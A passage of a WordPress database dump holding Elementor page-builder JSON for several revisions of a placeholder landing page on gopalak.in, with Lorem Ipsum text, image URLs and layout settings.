Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7563,1358,'_elementor_page_assets','a:0:{}'),(7565,1359,'_elementor_edit_mode','builder'),(7566,1359,'_elementor_template_type','landing-page'),(7567,1359,'_wp_page_template','elementor_canvas'),(7568,1359,'_elementor_version','3.7.6'),(7569,1359,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy text \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7570,1359,'_elementor_page_assets','a:0:{}'),(7572,1360,'_elementor_edit_mode','builder'),(7573,1360,'_elementor_template_type','landing-page'),(7574,1360,'_wp_page_template','elementor_canvas'),(7575,1360,'_elementor_version','3.7.6'),(7576,1360,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy text \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7577,1360,'_elementor_page_assets','a:0:{}'),(7587,1362,'_elementor_edit_mode','builder'),(7588,1362,'_elementor_template_type','landing-page'),(7589,1362,'_wp_page_template','elementor_canvas'),(7590,1362,'_elementor_version','3.7.6'),(7591,1362,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy text \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 